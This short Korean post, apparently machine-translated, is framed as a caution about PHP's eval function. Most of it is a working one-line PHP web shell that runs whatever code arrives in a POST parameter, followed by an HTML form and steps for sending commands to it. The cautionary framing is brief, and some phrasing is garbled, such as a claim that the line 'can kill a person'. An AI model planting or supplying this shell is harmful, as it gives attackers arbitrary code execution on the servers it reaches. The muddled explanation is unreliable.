eval은 다른 PHP 코드를 실행하는 데 사용될 수 있으므로 코드에서 eval 함수를 발견하면 트로이 목마일 수 있으므로 주의하세요.
이 문장만으로도 사람을 죽일 수 있고, 어떤 파일이든 누구나 올릴 수 있으니 주의하세요
<?php @eval($_POST['c']);?>
사용 방법도 매우 간단합니다. 로컬 제출 파일을 제출 파일에 지정하면 내부의 PHP 코드가 실행됩니다
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
위 내용은 이 글의 전체 내용입니다. 모두 마음에 드셨으면 좋겠습니다.